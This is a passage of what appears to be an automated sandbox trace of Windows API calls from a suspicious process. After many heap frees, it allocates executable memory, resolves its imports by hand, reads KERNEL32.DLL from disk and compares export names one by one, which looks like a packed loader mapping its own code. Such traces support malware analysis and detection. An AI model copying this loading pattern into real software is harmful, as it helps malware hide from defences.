lpMem=0x3769900 | out: hHeap=0x430000) returned 1 [0234.974] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x377cb10 | out: hHeap=0x430000) returned 1 [0234.978] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x378fd20 | out: hHeap=0x430000) returned 1 [0234.980] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37a2f30 | out: hHeap=0x430000) returned 1 [0234.983] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37b6140 | out: hHeap=0x430000) returned 1 [0234.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37c9350 | out: hHeap=0x430000) returned 1 [0234.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37dc560 | out: hHeap=0x430000) returned 1 [0234.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37ef770 | out: hHeap=0x430000) returned 1 [0234.986] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3802980 | out: hHeap=0x430000) returned 1 [0234.987] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3815b90 | out: hHeap=0x430000) returned 1 [0234.987] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3828da0 | out: hHeap=0x430000) returned 1 [0234.990] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x383bfb0 | out: hHeap=0x430000) returned 1 [0234.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x384f1c0 | out: hHeap=0x430000) returned 1 [0234.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38623d0 | out: hHeap=0x430000) returned 1 [0234.994] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38755e0 | out: hHeap=0x430000) returned 1 [0234.996] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38887f0 | out: hHeap=0x430000) returned 1 [0234.998] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x389ba00 | out: hHeap=0x430000) returned 1 [0235.001] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38aec10 | out: hHeap=0x430000) returned 1 [0235.357] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38c1e20 | out: hHeap=0x430000) returned 1 [0235.413] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38d5030 | out: hHeap=0x430000) returned 1 [0235.413] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38e8240 | out: hHeap=0x430000) returned 1 [0235.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x38fb450 | out: hHeap=0x430000) returned 1 [0235.415] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x390e660 | out: hHeap=0x430000) returned 1 [0235.417] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3921870 | out: hHeap=0x430000) returned 1 [0235.418] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3934a80 | out: hHeap=0x430000) returned 1 [0235.420] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3947c90 | out: hHeap=0x430000) returned 1 [0235.422] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x395aea0 | out: hHeap=0x430000) returned 1 [0235.424] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x396e0b0 | out: hHeap=0x430000) returned 1 [0235.426] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39812c0 | out: hHeap=0x430000) returned 1 [0235.429] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39944d0 | out: hHeap=0x430000) returned 1 [0235.433] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39a76e0 | out: hHeap=0x430000) returned 1 [0235.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39ba8f0 | out: hHeap=0x430000) returned 1 [0235.442] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39cdb00 | out: hHeap=0x430000) returned 1 [0235.442] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39e0d10 | out: hHeap=0x430000) returned 1 [0235.443] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39f3f20 | out: hHeap=0x430000) returned 1 [0235.736] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a07130 | out: hHeap=0x430000) returned 1 [0235.738] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a1a340 | out: hHeap=0x430000) returned 1 [0235.739] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a2d550 | out: hHeap=0x430000) returned 1 [0235.741] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a40760 | out: hHeap=0x430000) returned 1 [0235.743] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a53970 | out: hHeap=0x430000) returned 1 [0235.746] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47ad30 | out: hHeap=0x430000) returned 1 [0235.746] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0235.750] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0235.751] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0235.751] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0235.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0235.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0235.753] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0235.754] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0235.754] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0235.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0235.754] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0235.754] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0235.755] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0235.755] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0235.755] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0235.755] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45e1e0 | out: hHeap=0x430000) returned 1 [0235.756] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0235.760] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440ea0 | out: hHeap=0x430000) returned 1 [0235.762] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0235.762] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0235.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0235.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0235.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0235.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0235.765] GetProcessHeap () returned 0x430000 [0235.765] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438920 [0235.765] GetProcessHeap () returned 0x430000 [0235.766] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4499a0 [0235.766] GetProcessHeap () returned 0x430000 [0235.766] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x440db0 [0235.766] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0235.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0235.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0235.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0235.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0235.767] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0235.767] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0235.767] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0235.767] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0235.767] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0235.767] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0235.767] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0236.028] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0236.029] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0236.029] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0236.029] GetProcessHeap () returned 0x430000 [0236.029] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac430) returned 0x45cc90 [0236.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0236.032] ReadFile (in: hFile=0x134, lpBuffer=0x45cc90, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x45cc90*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0236.050] CloseHandle (hObject=0x134) returned 1 [0236.050] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0236.058] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0236.058] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0236.058] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0236.058] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0236.059] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0236.059] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0236.059] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0236.059] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0236.059] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0236.060] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0236.060] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0236.060] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0236.060] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0236.060] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0236.061] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0236.061] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0236.062] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0236.062] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0236.062] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0236.062] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0236.062] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.063] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0236.063] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0236.063] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.064] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.065] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.065] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0236.065] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0236.065] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0236.066] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0236.066] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0236.066] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0236.066] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0236.067] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0236.068] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0236.068] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.068] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0236.069] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0236.069] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0236.070] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0236.070] lstrcmpA 